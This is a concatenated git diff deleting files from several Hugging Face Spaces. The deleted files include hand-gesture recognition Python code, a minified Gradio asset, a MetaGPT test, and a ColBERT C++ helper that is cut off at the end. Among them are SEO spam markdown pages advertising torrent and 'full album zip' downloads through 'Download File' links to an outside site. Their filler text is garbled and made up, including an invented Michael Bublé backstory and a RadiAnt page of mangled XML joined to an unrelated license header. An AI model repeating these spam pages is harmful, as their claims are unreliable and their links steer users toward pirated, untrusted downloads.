# ############################################################# - image = cv.cvtColor(image, cv.COLOR_BGR2RGB) - - image.flags.writeable = False - results = hands.process(image) - image.flags.writeable = True - index_frame += 1 - # #################################################################### - if results.multi_hand_landmarks is not None: - times += 1 - - for hand_landmarks, handedness 
in zip(results.multi_hand_landmarks, - results.multi_handedness): - - # 外接矩形計算 - brect = calc_bounding_rect(debug_image, hand_landmarks) - # 关键点计算 - landmark_list, joints = calc_landmark_list(debug_image, hand_landmarks) - # if index_frame %3 == 0: - joints_list.append(np.array(joints)) - - # 描画 - debug_image = draw_bounding_rect(use_brect, debug_image, brect) - debug_image = draw_landmarks(debug_image, landmark_list) - - if len(joints_list) == ACTION_MODEL_MAX_FRAMES: - pts = np.array(joints_list, dtype=np.float32) - pts = prepocess(pts, (640, 480)) - pts = torch.from_numpy(pts) - pts = torch.unsqueeze(pts, dim=0) - out = model(pts) - - out = F.softmax(out) - - index = out[0].argmax() - action_name1 = actions[index] - action = '{}: {:.2f}%'.format(action_name, out[0].max() * 100) - joints_list = [] - print(action) - if out[0].max() > threshold: - action_name1 = action_name1 - else: - action_name1 = 'no_gesture' - - if action_name != action_name1: - # times += 1 - # ACTION_MODEL_MAX_FRAMES = 15 - action_name = action_name1 - # break - # action_name ='no_gesture' - else: - # ACTION_MODEL_MAX_FRAMES = 15 - # times -= 1 - action_name = action_name1 - - elif len(joints_list) == 0: - action_name = 'no_gesture' - - - # fps的计算 - fps = (fps + (1. / (time.time() - t1))) / 2 # 此处的time.time()就是检测完这张图片的结束时间,除以2是为了和之前的fps求一个平均 - print("fps= %.2f" % fps) - debug_image = cv2.putText(debug_image, "fps= %.2f" % (fps), (0, 40), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 0), 2) - # # 画面反映 ############################################################# - cv.putText(debug_image, ' '.join(action_name), (3, 70), - cv.FONT_HERSHEY_SIMPLEX, 1, (255, 255, 255), 2, cv.LINE_AA) - # cv.imshow('Hand Gesture Recognition', debug_image) - # # 处理(ESC:关闭) ################################################# - # key = cv.waitKey(1) - # if key == 27: # ESC - # break - - debug_image = Image.fromarray(cv2.cvtColor(debug_image, cv2.COLOR_BGR2RGB)) - # frame = pil_draw(frame, score_det_stat, bbox_det_stat, cls_det_stat, cls_index_det_stat, textFont, - # color_list, opt) - debug_image = cv2.cvtColor(np.asarray(debug_image), cv2.COLOR_RGB2BGR) - - # frame->video - frame.write(debug_image) - - - frame.release() - cap.release() - return output_video_path - # cv2.destroyAllWindows() - else: - print("视频加载失败!") - return None, None, None - cap.release() - cv.destroyAllWindows() - -def det_handpoints(args): - use_static_image_mode = args.use_static_image_mode - min_detection_confidence = args.min_detection_confidence - min_tracking_confidence = args.min_tracking_confidence - - use_brect = True - joints_list = [] - # 读取视频 ############################################################### - -if __name__ == '__main__': - - args = get_args() - ACTION_MODEL_MAX_FRAMES = 15 - - load_iters = 3000 # 加载之前训练的模型(指定迭代次数) - device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu") - - threshold = 0.996 - graph_args = {'strategy': 'spatial'} - - model = TwoStreamSpatialTemporalGraph(graph_args, 10) - model.eval() - pre = torch.load('weights/data_aug2/_hand_stgcn_fps15_21node_sgd_40.pth') - model.load_state_dict(pre, False) - model = torch.nn.DataParallel(model).cuda() - det_image(args,model,threshold,video_path=0) - - - - - - -def calc_bounding_rect(image, landmarks): - image_width, image_height = image.shape[1], image.shape[0] - - landmark_array = np.empty((0, 2), int) - - for _, landmark in enumerate(landmarks.landmark): - landmark_x = min(int(landmark.x * image_width), image_width - 1) - landmark_y = min(int(landmark.y * image_height), image_height 
- 1) - - landmark_point = [np.array((landmark_x, landmark_y))] - - landmark_array = np.append(landmark_array, landmark_point, axis=0) - - x, y, w, h = cv.boundingRect(landmark_array) - - return [x, y, x + w, y + h] - - -def calc_landmark_list(image, landmarks): - image_width, image_height = image.shape[1], image.shape[0] - - landmark_point = [] - joint = [] - # キーポイント - for _, landmark in enumerate(landmarks.landmark): - landmark_x = min(int(landmark.x * image_width), image_width - 1) - landmark_y = min(int(landmark.y * image_height), image_height - 1) - landmark_z = landmark.z - landmark_v = landmark.visibility - # np.array(landmark_x) - landmark_point.append([landmark_x, landmark_y]) - joint.append([landmark_x, landmark_y,landmark_v]) - # landmark_point.append([landmark_x, landmark_y,landmark_z]) - return landmark_point,joint - - - -def pre_process_landmark(landmark_list): - temp_landmark_list = copy.deepcopy(landmark_list) - - # 相対座標に変換 - base_x, base_y = 0, 0 - for index, landmark_point in enumerate(temp_landmark_list): - if index == 0: - base_x, base_y = landmark_point[0], landmark_point[1] - - temp_landmark_list[index][0] = temp_landmark_list[index][0] - base_x - temp_landmark_list[index][1] = temp_landmark_list[index][1] - base_y - - # 1次元リストに変換 - temp_landmark_list = list( - itertools.chain.from_iterable(temp_landmark_list)) - - # 正規化 - max_value = max(list(map(abs, temp_landmark_list))) - - def normalize_(n): - return n / max_value - - temp_landmark_list = list(map(normalize_, temp_landmark_list)) - - return temp_landmark_list - - -def pre_process_point_history(image, point_history): - image_width, image_height = image.shape[1], image.shape[0] - - temp_point_history = copy.deepcopy(point_history) - - # 相対座標に変換 - base_x, base_y = 0, 0 - for index, point in enumerate(temp_point_history): - if index == 0: - base_x, base_y = point[0], point[1] - - temp_point_history[index][0] = (temp_point_history[index][0] - - base_x) / image_width - temp_point_history[index][1] = (temp_point_history[index][1] - - base_y) / image_height - - # 1次元リストに変換 - temp_point_history = list( - itertools.chain.from_iterable(temp_point_history)) - - return temp_point_history - - -def logging_csv(number, mode, landmark_list, point_history_list): - if mode == 0: - pass - if mode == 1 and (0 <= number <= 9): - csv_path = 'model/keypoint_classifier/keypoint.csv' - with open(csv_path, 'a', newline="") as f: - writer = csv.writer(f) - writer.writerow([number, *landmark_list]) - if mode == 2 and (0 <= number <= 9): - csv_path = 'model/point_history_classifier/point_history.csv' - with open(csv_path, 'a', newline="") as f: - writer = csv.writer(f) - writer.writerow([number, *point_history_list]) - return - - -def draw_landmarks(image, landmark_point): - # 接続線 - if len(landmark_point) > 0: - # 親指 - cv.line(image, tuple(landmark_point[2]), tuple(landmark_point[3]), - (0, 0, 0), 6) - cv.line(image, tuple(landmark_point[2]), tuple(landmark_point[3]), - (255, 255, 255), 2) - cv.line(image, tuple(landmark_point[3]), tuple(landmark_point[4]), - (0, 0, 0), 6) - cv.line(image, tuple(landmark_point[3]), tuple(landmark_point[4]), - (255, 255, 255), 2) - - # 人差指 - cv.line(image, tuple(landmark_point[5]), tuple(landmark_point[6]), - (0, 0, 0), 6) - cv.line(image, tuple(landmark_point[5]), tuple(landmark_point[6]), - (255, 255, 255), 2) - cv.line(image, tuple(landmark_point[6]), tuple(landmark_point[7]), - (0, 0, 0), 6) - cv.line(image, tuple(landmark_point[6]), tuple(landmark_point[7]), - (255, 255, 255), 2) - cv.line(image, 
tuple(landmark_point[7]), tuple(landmark_point[8]), - (0, 0, 0), 6) - cv.line(image, tuple(landmark_point[7]), tuple(landmark_point[8]), - (255, 255, 255), 2) - - # 中指 - cv.line(image, tuple(landmark_point[9]), tuple(landmark_point[10]), - (0, 0, 0), 6) - cv.line(image, tuple(landmark_point[9]), tuple(landmark_point[10]), - (255, 255, 255), 2) - cv.line(image, tuple(landmark_point[10]), tuple(landmark_point[11]), - (0, 0, 0), 6) - cv.line(image, tuple(landmark_point[10]), tuple(landmark_point[11]), - (255, 255, 255), 2) - cv.line(image, tuple(landmark_point[11]), tuple(landmark_point[12]), - (0, 0, 0), 6) - cv.line(image, tuple(landmark_point[11]), tuple(landmark_point[12]), - (255, 255, 255), 2) - - # 薬指 - cv.line(image, tuple(landmark_point[13]), tuple(landmark_point[14]), - (0, 0, 0), 6) - cv.line(image, tuple(landmark_point[13]), tuple(landmark_point[14]), - (255, 255, 255), 2) - cv.line(image, tuple(landmark_point[14]), tuple(landmark_point[15]), - (0, 0, 0), 6) - cv.line(image, tuple(landmark_point[14]), tuple(landmark_point[15]), - (255, 255, 255), 2) - cv.line(image, tuple(landmark_point[15]), tuple(landmark_point[16]), - (0, 0, 0), 6) - cv.line(image, tuple(landmark_point[15]), tuple(landmark_point[16]), - (255, 255, 255), 2) - - # 小指 - cv.line(image, tuple(landmark_point[17]), tuple(landmark_point[18]), - (0, 0, 0), 6) - cv.line(image, tuple(landmark_point[17]), tuple(landmark_point[18]), - (255, 255, 255), 2) - cv.line(image, tuple(landmark_point[18]), tuple(landmark_point[19]), - (0, 0, 0), 6) - cv.line(image, tuple(landmark_point[18]), tuple(landmark_point[19]), - (255, 255, 255), 2) - cv.line(image, tuple(landmark_point[19]), tuple(landmark_point[20]), - (0, 0, 0), 6) - cv.line(image, tuple(landmark_point[19]), tuple(landmark_point[20]), - (255, 255, 255), 2) - - # 手の平 - cv.line(image, tuple(landmark_point[0]), tuple(landmark_point[1]), - (0, 0, 0), 6) - cv.line(image, tuple(landmark_point[0]), tuple(landmark_point[1]), - (255, 255, 255), 2) - cv.line(image, tuple(landmark_point[1]), tuple(landmark_point[2]), - (0, 0, 0), 6) - cv.line(image, tuple(landmark_point[1]), tuple(landmark_point[2]), - (255, 255, 255), 2) - cv.line(image, tuple(landmark_point[2]), tuple(landmark_point[5]), - (0, 0, 0), 6) - cv.line(image, tuple(landmark_point[2]), tuple(landmark_point[5]), - (255, 255, 255), 2) - cv.line(image, tuple(landmark_point[5]), tuple(landmark_point[9]), - (0, 0, 0), 6) - cv.line(image, tuple(landmark_point[5]), tuple(landmark_point[9]), - (255, 255, 255), 2) - cv.line(image, tuple(landmark_point[9]), tuple(landmark_point[13]), - (0, 0, 0), 6) - cv.line(image, tuple(landmark_point[9]), tuple(landmark_point[13]), - (255, 255, 255), 2) - cv.line(image, tuple(landmark_point[13]), tuple(landmark_point[17]), - (0, 0, 0), 6) - cv.line(image, tuple(landmark_point[13]), tuple(landmark_point[17]), - (255, 255, 255), 2) - cv.line(image, tuple(landmark_point[17]), tuple(landmark_point[0]), - (0, 0, 0), 6) - cv.line(image, tuple(landmark_point[17]), tuple(landmark_point[0]), - (255, 255, 255), 2) - - # キーポイント - for index, landmark in enumerate(landmark_point): - if index == 0: # 手首1 - cv.circle(image, (landmark[0], landmark[1]), 5, (255, 255, 255), - -1) - cv.circle(image, (landmark[0], landmark[1]), 5, (0, 0, 0), 1) - if index == 1: # 手首2 - cv.circle(image, (landmark[0], landmark[1]), 5, (255, 255, 255), - -1) - cv.circle(image, (landmark[0], landmark[1]), 5, (0, 0, 0), 1) - if index == 2: # 親指:付け根 - cv.circle(image, (landmark[0], landmark[1]), 5, (255, 255, 255), - -1) - 
cv.circle(image, (landmark[0], landmark[1]), 5, (0, 0, 0), 1) - if index == 3: # 親指:第1関節 - cv.circle(image, (landmark[0], landmark[1]), 5, (255, 255, 255), - -1) - cv.circle(image, (landmark[0], landmark[1]), 5, (0, 0, 0), 1) - if index == 4: # 親指:指先 - cv.circle(image, (landmark[0], landmark[1]), 8, (255, 255, 255), - -1) - cv.circle(image, (landmark[0], landmark[1]), 8, (0, 0, 0), 1) - if index == 5: # 人差指:付け根 - cv.circle(image, (landmark[0], landmark[1]), 5, (255, 255, 255), - -1) - cv.circle(image, (landmark[0], landmark[1]), 5, (0, 0, 0), 1) - if index == 6: # 人差指:第2関節 - cv.circle(image, (landmark[0], landmark[1]), 5, (255, 255, 255), - -1) - cv.circle(image, (landmark[0], landmark[1]), 5, (0, 0, 0), 1) - if index == 7: # 人差指:第1関節 - cv.circle(image, (landmark[0], landmark[1]), 5, (255, 255, 255), - -1) - cv.circle(image, (landmark[0], landmark[1]), 5, (0, 0, 0), 1) - if index == 8: # 人差指:指先 - cv.circle(image, (landmark[0], landmark[1]), 8, (255, 255, 255), - -1) - cv.circle(image, (landmark[0], landmark[1]), 8, (0, 0, 0), 1) - if index == 9: # 中指:付け根 - cv.circle(image, (landmark[0], landmark[1]), 5, (255, 255, 255), - -1) - cv.circle(image, (landmark[0], landmark[1]), 5, (0, 0, 0), 1) - if index == 10: # 中指:第2関節 - cv.circle(image, (landmark[0], landmark[1]), 5, (255, 255, 255), - -1) - cv.circle(image, (landmark[0], landmark[1]), 5, (0, 0, 0), 1) - if index == 11: # 中指:第1関節 - cv.circle(image, (landmark[0], landmark[1]), 5, (255, 255, 255), - -1) - cv.circle(image, (landmark[0], landmark[1]), 5, (0, 0, 0), 1) - if index == 12: # 中指:指先 - cv.circle(image, (landmark[0], landmark[1]), 8, (255, 255, 255), - -1) - cv.circle(image, (landmark[0], landmark[1]), 8, (0, 0, 0), 1) - if index == 13: # 薬指:付け根 - cv.circle(image, (landmark[0], landmark[1]), 5, (255, 255, 255), - -1) - cv.circle(image, (landmark[0], landmark[1]), 5, (0, 0, 0), 1) - if index == 14: # 薬指:第2関節 - cv.circle(image, (landmark[0], landmark[1]), 5, (255, 255, 255), - -1) - cv.circle(image, (landmark[0], landmark[1]), 5, (0, 0, 0), 1) - if index == 15: # 薬指:第1関節 - cv.circle(image, (landmark[0], landmark[1]), 5, (255, 255, 255), - -1) - cv.circle(image, (landmark[0], landmark[1]), 5, (0, 0, 0), 1) - if index == 16: # 薬指:指先 - cv.circle(image, (landmark[0], landmark[1]), 8, (255, 255, 255), - -1) - cv.circle(image, (landmark[0], landmark[1]), 8, (0, 0, 0), 1) - if index == 17: # 小指:付け根 - cv.circle(image, (landmark[0], landmark[1]), 5, (255, 255, 255), - -1) - cv.circle(image, (landmark[0], landmark[1]), 5, (0, 0, 0), 1) - if index == 18: # 小指:第2関節 - cv.circle(image, (landmark[0], landmark[1]), 5, (255, 255, 255), - -1) - cv.circle(image, (landmark[0], landmark[1]), 5, (0, 0, 0), 1) - if index == 19: # 小指:第1関節 - cv.circle(image, (landmark[0], landmark[1]), 5, (255, 255, 255), - -1) - cv.circle(image, (landmark[0], landmark[1]), 5, (0, 0, 0), 1) - if index == 20: # 小指:指先 - cv.circle(image, (landmark[0], landmark[1]), 8, (255, 255, 255), - -1) - cv.circle(image, (landmark[0], landmark[1]), 8, (0, 0, 0), 1) - - return image - - -def draw_bounding_rect(use_brect, image, brect): - if use_brect: - # 外接矩形 - cv.rectangle(image, (brect[0], brect[1]), (brect[2], brect[3]), - (255, 0, 0), 3) - - return image - - -def draw_info_text(image, brect, hand_sign_text, conf - ): - cv.rectangle(image, (brect[0], brect[1]), (brect[2], brect[1] - 22), - (0, 0, 0), -1) - - # info_text = handedness.classification[0].label[0:] - if hand_sign_text != "": - # info_text = info_text + ':' + hand_sign_text - info_text = hand_sign_text + ':' + conf - - 
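# --- Editor's aside (illustration, not part of the original diff): the long run of per-index
# cv.circle calls in draw_landmarks above can be expressed as a single loop. This is an equivalent
# sketch rather than code from the original file; it assumes landmark_point is the list of (x, y)
# pairs returned by calc_landmark_list, with MediaPipe fingertip indices 4, 8, 12, 16 and 20.
import cv2 as cv

def draw_keypoints_compact(image, landmark_point):
    fingertips = {4, 8, 12, 16, 20}
    for idx, (x, y) in enumerate(landmark_point):
        radius = 8 if idx in fingertips else 5
        cv.circle(image, (x, y), radius, (255, 255, 255), -1)   # filled white dot
        cv.circle(image, (x, y), radius, (0, 0, 0), 1)          # black outline
    return image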
cv.putText(image, info_text, (brect[0] + 5, brect[1] - 4), - cv.FONT_HERSHEY_SIMPLEX, 0.6, (255, 255, 255), 1, cv.LINE_AA) - - # if finger_gesture_text != "": - # cv.putText(image, "Finger Gesture:" + finger_gesture_text, (10, 60), - # cv.FONT_HERSHEY_SIMPLEX, 1.0, (0, 0, 0), 4, cv.LINE_AA) - # cv.putText(image, "Finger Gesture:" + finger_gesture_text, (10, 60), - # cv.FONT_HERSHEY_SIMPLEX, 1.0, (255, 255, 255), 2, - # cv.LINE_AA) - - return image - - -def draw_point_history(image, point_history): - for index, point in enumerate(point_history): - if point[0] != 0 and point[1] != 0: - cv.circle(image, (point[0], point[1]), 1 + int(index / 2), - (152, 251, 152), 2) - - return image - - -def draw_info(image, fps, mode, number): - cv.putText(image, "FPS:" + str(fps), (10, 30), cv.FONT_HERSHEY_SIMPLEX, - 1.0, (0, 0, 0), 4, cv.LINE_AA) - cv.putText(image, "FPS:" + str(fps), (10, 30), cv.FONT_HERSHEY_SIMPLEX, - 1.0, (255, 255, 255), 2, cv.LINE_AA) - - mode_string = ['Logging Key Point', 'Logging Point History'] - if 1 <= mode <= 2: - cv.putText(image, "MODE:" + mode_string[mode - 1], (10, 90), - cv.FONT_HERSHEY_SIMPLEX, 0.6, (255, 255, 255), 1, - cv.LINE_AA) - if 0 <= number <= 9: - cv.putText(image, "NUM:" + str(number), (10, 110), - cv.FONT_HERSHEY_SIMPLEX, 0.6, (255, 255, 255), 1, - cv.LINE_AA) - return image - - - diff --git a/spaces/dcarpintero/nlp-summarizer-pegasus/.venv/lib/python3.9/site-packages/gradio/templates/frontend/assets/index-dec38bdd.js b/spaces/dcarpintero/nlp-summarizer-pegasus/.venv/lib/python3.9/site-packages/gradio/templates/frontend/assets/index-dec38bdd.js deleted file mode 100644 index 5d901471e0565cb3a4d1bf2aaaba55921d4e1d07..0000000000000000000000000000000000000000 --- a/spaces/dcarpintero/nlp-summarizer-pegasus/.venv/lib/python3.9/site-packages/gradio/templates/frontend/assets/index-dec38bdd.js +++ /dev/null @@ -1,2 +0,0 @@ -import{S as m,e as u,s as r,F as d,G as b,w as _,u as f,H as g,a9 as v,ab as S,ac as h,ad as k}from"./index-39fce9e2.js";import{B as p}from"./Button-79f6e3bf.js";function w(a){let t;const l=a[3].default,e=v(l,a,a[4],null);return{c(){e&&e.c()},m(s,n){e&&e.m(s,n),t=!0},p(s,n){e&&e.p&&(!t||n&16)&&S(e,l,s,s[4],t?k(l,s[4],n,null):h(s[4]),null)},i(s){t||(_(e,s),t=!0)},o(s){f(e,s),t=!1},d(s){e&&e.d(s)}}}function B(a){let t,l;return t=new p({props:{elem_id:a[0],elem_classes:a[1],visible:a[2],explicit_call:!0,$$slots:{default:[w]},$$scope:{ctx:a}}}),{c(){d(t.$$.fragment)},m(e,s){b(t,e,s),l=!0},p(e,[s]){const n={};s&1&&(n.elem_id=e[0]),s&2&&(n.elem_classes=e[1]),s&4&&(n.visible=e[2]),s&16&&(n.$$scope={dirty:s,ctx:e}),t.$set(n)},i(e){l||(_(t.$$.fragment,e),l=!0)},o(e){f(t.$$.fragment,e),l=!1},d(e){g(t,e)}}}function C(a,t,l){let{$$slots:e={},$$scope:s}=t,{elem_id:n}=t,{elem_classes:o}=t,{visible:c=!0}=t;return a.$$set=i=>{"elem_id"in i&&l(0,n=i.elem_id),"elem_classes"in i&&l(1,o=i.elem_classes),"visible"in i&&l(2,c=i.visible),"$$scope"in i&&l(4,s=i.$$scope)},[n,o,c,e,s]}class q extends m{constructor(t){super(),u(this,t,C,B,r,{elem_id:0,elem_classes:1,visible:2})}}const H=q,j=["static"];export{H as Component,j as modes}; -//# sourceMappingURL=index-dec38bdd.js.map diff --git a/spaces/deepwisdom/MetaGPT/tests/metagpt/test_llm.py b/spaces/deepwisdom/MetaGPT/tests/metagpt/test_llm.py deleted file mode 100644 index f61793151e62f143356e75249474b9dd60b50de7..0000000000000000000000000000000000000000 --- a/spaces/deepwisdom/MetaGPT/tests/metagpt/test_llm.py +++ /dev/null @@ -1,37 +0,0 @@ -#!/usr/bin/env python -# -*- coding: utf-8 -*- -""" -@Time : 2023/5/11 14:45 
-@Author : alexanderwu -@File : test_llm.py -@Modified By: mashenquan, 2023/8/20. Remove global configuration `CONFIG`, enable configuration support for business isolation. -""" - -import pytest - -from metagpt.config import Config -from metagpt.provider.openai_api import OpenAIGPTAPI as LLM, CostManager - - -@pytest.fixture() -def llm(): - options = Config().runtime_options - return LLM(options=options, cost_manager=CostManager(**options)) - - -@pytest.mark.asyncio -async def test_llm_aask(llm): - assert len(await llm.aask('hello world')) > 0 - - -@pytest.mark.asyncio -async def test_llm_aask_batch(llm): - assert len(await llm.aask_batch(['hi', 'write python hello world.'])) > 0 - - -@pytest.mark.asyncio -async def test_llm_acompletion(llm): - hello_msg = [{'role': 'user', 'content': 'hello'}] - assert len(await llm.acompletion(hello_msg)) > 0 - assert len(await llm.acompletion_batch([hello_msg])) > 0 - assert len(await llm.acompletion_batch_text([hello_msg])) > 0 diff --git a/spaces/dennis-fast/Talk2Elon/README.md b/spaces/dennis-fast/Talk2Elon/README.md deleted file mode 100644 index 32ddb690ab99ed716d40410a91eaa9f4d7c24b29..0000000000000000000000000000000000000000 --- a/spaces/dennis-fast/Talk2Elon/README.md +++ /dev/null @@ -1,13 +0,0 @@ ---- -title: Talk2Elon -emoji: 🤛 -colorFrom: green -colorTo: yellow -sdk: gradio -sdk_version: 3.0.13 -app_file: app.py -pinned: false -license: mit ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/diacanFperku/AutoGPT/Cirque Du Soleil Ovo 2010 HDTVRip 720p-torrent.torrent.md b/spaces/diacanFperku/AutoGPT/Cirque Du Soleil Ovo 2010 HDTVRip 720p-torrent.torrent.md deleted file mode 100644 index 5ee1956ee4f3165dbb08b87b6edc5f6f881e9636..0000000000000000000000000000000000000000 --- a/spaces/diacanFperku/AutoGPT/Cirque Du Soleil Ovo 2010 HDTVRip 720p-torrent.torrent.md +++ /dev/null @@ -1,17 +0,0 @@ -

      Cirque du Soleil Ovo 2010 HDTVRip 720p-torrent.torrent


Download File https://gohhs.com/2uFUzd



      -
      -cirque du soleil ovo 2010 hdtvrip 720p-. Download movie "Circus" -Circus "Lake" -The Lake Circus is a science fiction fantasy film. -The Lake Circus - The Lake Circus (2010) | TvZavr.ru. -Cast: Peter O'Toole, Laia Costa, Judi Dench, Michelle Paris, Michelle Williams, Peta Sergeant, Peter McDonald. -The film "Circus Lake" tells how a young girl falls in love with a circus performer. -Circus "lake" (2005) watch online for free in good quality. -Cite web no language specified Wikipedia: Cirque Du Soleil Ovo 2010 HDTVRip 720p-torrent.zipgolkes 593faadb19 there is only 1 podcast. -How to download videos from YouTube, Vimeo, DailyMotion and other video sites through the program. -YouTube video downloader. -YouTube Downloader allows you to quickly and conveniently download videos from YouTube as well. -We only have 1 podcast. 8a78ff9644
      -
      -
      -

      diff --git a/spaces/diacanFperku/AutoGPT/Donnie Mcclurkin-Psalms Hymns And Spiritual Songs (cd1) Full Album Zip.md b/spaces/diacanFperku/AutoGPT/Donnie Mcclurkin-Psalms Hymns And Spiritual Songs (cd1) Full Album Zip.md deleted file mode 100644 index 7437c330286f6e7062abdca1155d03fbaa9a2c6b..0000000000000000000000000000000000000000 --- a/spaces/diacanFperku/AutoGPT/Donnie Mcclurkin-Psalms Hymns And Spiritual Songs (cd1) Full Album Zip.md +++ /dev/null @@ -1,6 +0,0 @@ -

      Donnie Mcclurkin-Psalms, Hymns and Spiritual Songs (cd1) full album zip


      DOWNLOAD ->->->-> https://gohhs.com/2uFTMH



      -
      -Donnie McClurkin - Psalms, Hymns & Spiritual Songs (2005) ... http://www.zshare.net/download/2103-2103-zip.html. Tonéx Presents: T.R.O.N. ... 1fdad05405
      -
      -
      -

      diff --git a/spaces/diacanFperku/AutoGPT/Michael Buble The Greatest Hits Torrent.md b/spaces/diacanFperku/AutoGPT/Michael Buble The Greatest Hits Torrent.md deleted file mode 100644 index 8e2d28b880dd6258136cb5217e14b7ed78aa114e..0000000000000000000000000000000000000000 --- a/spaces/diacanFperku/AutoGPT/Michael Buble The Greatest Hits Torrent.md +++ /dev/null @@ -1,10 +0,0 @@ -
      -

This intimate show really captures the spirit of the Michael Bublé Tour. Whether you are at home, at the gym, or on the go, we have the perfect ticket for you. And with all seating options and ticketing locations, there is something for everyone.

      -

      michael buble the greatest hits torrent


      Download Zip ✯✯✯ https://gohhs.com/2uFTEu



      -

For the first time ever, Michael Bublé released a Christmas album in 2014, but he had already been working on it since his Thanksgiving album, The Michael Bublé Christmas Album, debuted at number two on the Billboard 200 chart. The album had been conceptualized over the years, but for its recording Bublé had to secure the approval of his grandfather, who had passed away a few years earlier. His grandfather's papers, and his job at the jazz music department of the California Academy of Sciences in San Francisco, helped Bublé with the collection. The occasion was more than just a signing of his legal guardian. The Michael Bublé Christmas Album paid tribute to the memories of his grandfather. "He'd be so proud of me," Bublé recalls.

      -

Christmas is obviously a very happy time. But there are a few people who aren't so great during the holidays, like a certain little kid called Charlie Brown, and one of those people is Michael Bublé.

      -

His grandfather passionately supported his career, believing Michael was destined to be an opening act for somebody in Las Vegas. He was inspired by his grandfather's jazz collection and continued to develop his classic Sinatra style.

      -

It all started back in about 2005, when I started my first year of high school, and as we all know, sisters seem to have a natural inclination to claim things from each other (without the other sister knowing, of course). Now, I didn't feel the need to claim my older sister's clothes and make-up, but I did however find a certain something that I was just never going to give back! At that stage my sister was working and I didn't really get an allowance, so I thought I could borrow a few CDs to listen to on my Walkman :) Michael Bublé's first self-titled album happened to be one of the CDs I borrowed.

      -

      899543212b
      -
      -
      \ No newline at end of file diff --git a/spaces/diacanFperku/AutoGPT/RadiAnt.DICOM.Viewer.1.0.4.with.Serial !FULL!.md b/spaces/diacanFperku/AutoGPT/RadiAnt.DICOM.Viewer.1.0.4.with.Serial !FULL!.md deleted file mode 100644 index e13813af903557ea2ca384e8797e296ac42d8d20..0000000000000000000000000000000000000000 --- a/spaces/diacanFperku/AutoGPT/RadiAnt.DICOM.Viewer.1.0.4.with.Serial !FULL!.md +++ /dev/null @@ -1,52 +0,0 @@ -

      RadiAnt.DICOM.Viewer.1.0.4.with.Serial


Download File https://gohhs.com/2uFV8K



      - -ization.builtin.xml.viewer.configuration.files"> - -The DICOM configuration file contains the and tag. - -The tag defines the content of the configuration file. - -The attributes of the tag are self explanatory. - -The tag may contain one node. - -The node contains the and tag. - -The DICOM configuration file ends with the tag. - -The file dicom.viewer.1.0.4.with.serialization.builtin.xml.viewer.configuration.files contains the and tag. - -The file dicom.viewer.1.0.4.with.serialization.builtin.xml.viewer.configuration.files ends with the tag. - -/* - - * Copyright (C) 2018 - present Instructure, Inc. - - * - - * This file is part of Canvas. - - * Canvas is free software: you can redistribute it and/or modify it under - - * the terms of the GNU Affero General Public License as published by the Free - - * Software Foundation, version 3 of the License. - - * Canvas is distributed in the hope that it will be useful, but WITHOUT ANY - - * WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR - - * A PARTICULAR PURPOSE. See the GNU Affero General Public License for more - - * details. - - * You should have received a copy of the GNU Affero General Public License along - - * with this program. If not, see . - - */ - -import expect from '../../../helpers/ 4fefd39f24
      -
      -
      -

      diff --git a/spaces/diagaiwei/ir_chinese_medqa/colbert/search/filter_pids.cpp b/spaces/diagaiwei/ir_chinese_medqa/colbert/search/filter_pids.cpp deleted file mode 100644 index 6f9b0909910c7bfe6d418e50a914e0130a6bb4d0..0000000000000000000000000000000000000000 --- a/spaces/diagaiwei/ir_chinese_medqa/colbert/search/filter_pids.cpp +++ /dev/null @@ -1,169 +0,0 @@ -#include -#include - -#include -#include -#include -#include - -typedef struct maxsim_args { - int tid; - int nthreads; - - int ncentroids; - int nquery_vectors; - int npids; - - int* pids; - float* centroid_scores; - int* codes; - int64_t* doclens; - int64_t* offsets; - bool* idx; - - std::priority_queue> approx_scores; -} maxsim_args_t; - -void* maxsim(void* args) { - maxsim_args_t* maxsim_args = (maxsim_args_t*)args; - - float per_doc_approx_scores[maxsim_args->nquery_vectors]; - for (int k = 0; k < maxsim_args->nquery_vectors; k++) { - per_doc_approx_scores[k] = -9999; - } - - int ndocs_per_thread = - (int)std::ceil(((float)maxsim_args->npids) / maxsim_args->nthreads); - int start = maxsim_args->tid * ndocs_per_thread; - int end = - std::min((maxsim_args->tid + 1) * ndocs_per_thread, maxsim_args->npids); - - std::unordered_set seen_codes; - - for (int i = start; i < end; i++) { - auto pid = maxsim_args->pids[i]; - for (int j = 0; j < maxsim_args->doclens[pid]; j++) { - auto code = maxsim_args->codes[maxsim_args->offsets[pid] + j]; - assert(code < maxsim_args->ncentroids); - if (maxsim_args->idx[code] && - seen_codes.find(code) == seen_codes.end()) { - for (int k = 0; k < maxsim_args->nquery_vectors; k++) { - per_doc_approx_scores[k] = - std::max(per_doc_approx_scores[k], - maxsim_args->centroid_scores - [code * maxsim_args->nquery_vectors + k]); - } - seen_codes.insert(code); - } - } - float score = 0; - for (int k = 0; k < maxsim_args->nquery_vectors; k++) { - score += per_doc_approx_scores[k]; - per_doc_approx_scores[k] = -9999; - } - maxsim_args->approx_scores.push(std::make_pair(score, pid)); - seen_codes.clear(); - } - - return NULL; -} - -void filter_pids_helper(int ncentroids, int nquery_vectors, int npids, - int* pids, float* centroid_scores, int* codes, - int64_t* doclens, int64_t* offsets, bool* idx, - int nfiltered_docs, int* filtered_pids) { - auto nthreads = at::get_num_threads(); - - pthread_t threads[nthreads]; - maxsim_args_t args[nthreads]; - - for (int i = 0; i < nthreads; i++) { - args[i].tid = i; - args[i].nthreads = nthreads; - - args[i].ncentroids = ncentroids; - args[i].nquery_vectors = nquery_vectors; - args[i].npids = npids; - - args[i].pids = pids; - args[i].centroid_scores = centroid_scores; - args[i].codes = codes; - args[i].doclens = doclens; - args[i].offsets = offsets; - args[i].idx = idx; - - args[i].approx_scores = std::priority_queue>(); - - int rc = pthread_create(&threads[i], NULL, maxsim, (void*)&args[i]); - if (rc) { - fprintf(stderr, "Unable to create thread %d: %d\n", i, rc); - std::exit(1); - } - } - - for (int i = 0; i < nthreads; i++) { - pthread_join(threads[i], NULL); - } - - std::priority_queue> global_approx_scores; - for (int i = 0; i < nthreads; i++) { - for (int j = 0; j < nfiltered_docs; j++) { - if (args[i].approx_scores.empty()) { - break; - } - global_approx_scores.push(args[i].approx_scores.top()); - args[i].approx_scores.pop(); - } - } - - for (int i = 0; i < nfiltered_docs; i++) { - std::pair score_and_pid = global_approx_scores.top(); - filtered_pids[i] = score_and_pid.second; - 